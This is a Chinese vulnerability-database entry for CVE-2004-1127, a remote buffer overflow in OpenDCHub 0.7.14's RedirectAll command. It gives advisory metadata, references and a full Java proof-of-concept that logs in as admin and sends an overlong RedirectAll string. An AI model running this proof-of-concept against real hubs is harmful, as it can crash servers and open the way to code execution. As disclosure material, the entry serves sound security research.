OpenDCHub RedirectALL 缓冲区溢出漏洞

OpenDCHub RedirectALL 缓冲区溢出漏洞

漏洞ID 1108299 漏洞类型 缓冲区溢出
发布时间 2004-11-24 更新时间 2005-10-20
图片[1]-OpenDCHub RedirectALL 缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1127
图片[2]-OpenDCHub RedirectALL 缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200501-212
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/24774
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-212
|漏洞详情
OpenDCHub是一款用于直连网络的HUB软件。OpenDCHub0.7.14中存在缓冲区溢出漏洞。具有管理员权限的远程攻击者可以通过超长的RedirectAll命令,利用此漏洞执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11747/info

A remote buffer overflow vulnerability reportedly affects the Open DC Hub. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into finite process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.


/* 
   Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
   Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;



public class OpenDcHub0714_BOF_poc {


	private static int PORT  = 53696;
	private static int MAXSZ = 512;
        private static String VERSION = "0.1";

	public static void main(String [] args){

	   System.out.println(
			      "nn" +
			      "Open Dc Hub - Buffer Overflow - Proof Of Conceptn" +
			      "Version: " + VERSION + "n"      +
			      "coded by: Donato Ferranten"     +
			      "e-mail: [email protected]" +
			      "web: www.autistici.org/fdonatonn"
           );

		if(args.length <= 1){
			System.out.println(
					"Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>n" +
					"Note:  default port is 53696.n"
					);
			System.exit(-1);
		}

		String host = args[0];
		String admin_password = args[args.length - 1];
		int port = PORT;

		try{
			if(args.length > 2)
				port = Integer.parseInt(args[1]);
		}catch(Exception e){ port = PORT; }

		try{
		
			Socket socket = new Socket(host, port);
			socket.setSoTimeout(10000);
			BufferedReader in_stream  = new BufferedReader(new InputStreamReader(socket.getInputStream()));
			PrintStream out_stream    = new PrintStream(socket.getOutputStream());

			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());
			System.out.println(in_stream.readLine());

			System.out.println("Logging...");
			out_stream.println("$adminpass " + admin_password +"|n");

			in_stream.readLine();
			String err = in_stream.readLine();

			if(err.toLowerCase().indexOf("bad") >= 0){
				System.out.println("Login failed...");
				System.out.println("Exiting...");
				System.exit(-1);
			}
			else
				System.out.println("Logged in...");

			
			System.out.println("Building test string to inject...");
			String buff = build();
			Thread.sleep(1500);

			System.out.println("Injecting test string...");
			out_stream.println(buff);
			Thread.sleep(1500);

			System.out.println("Proof_Of_Concept terminated.");

		}catch(SocketTimeoutException ste){System.out.println("Socket timeout."); System.exit(-1);}
		 catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
                 catch(InterruptedException ie){ System.out.println("Thread warning...");}
                 catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1);}


	}





	private static String build(){

		String over = "";
		for(int i = 0; i < MAXSZ; i++)
			over += 0x61;
		
		String ret = "$RedirectAll " + over + "|n";
		return ret;
	}


}
|参考资料

来源:BID
名称:11747
链接:http://www.securityfocus.com/bid/11747
来源:BUGTRAQ
名称:20041124BufferOverflowinOpenDcHub0.7.14
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110144606411674&w;=2
来源:XF
名称:open-hub-redirectall-bo(18254)
链接:http://xforce.iss.net/xforce/xfdb/18254
来源:GENTOO
名称:GLSA-200411-37
链接:http://www.gentoo.org/security/en/glsa/glsa-200411-37.xml
来源:FULLDISC
名称:20041124BufferOverflowinOpenDcHub0.7.14
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/029383.html

相关推荐: Riverdark Studios RSS 多个跨站脚本攻击(XSS)漏洞

Riverdark Studios RSS 多个跨站脚本攻击(XSS)漏洞 漏洞ID 1197767 漏洞类型 跨站脚本 发布时间 2005-09-27 更新时间 2005-09-27 CVE编号 CVE-2005-3085 CNNVD-ID CNNVD-20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享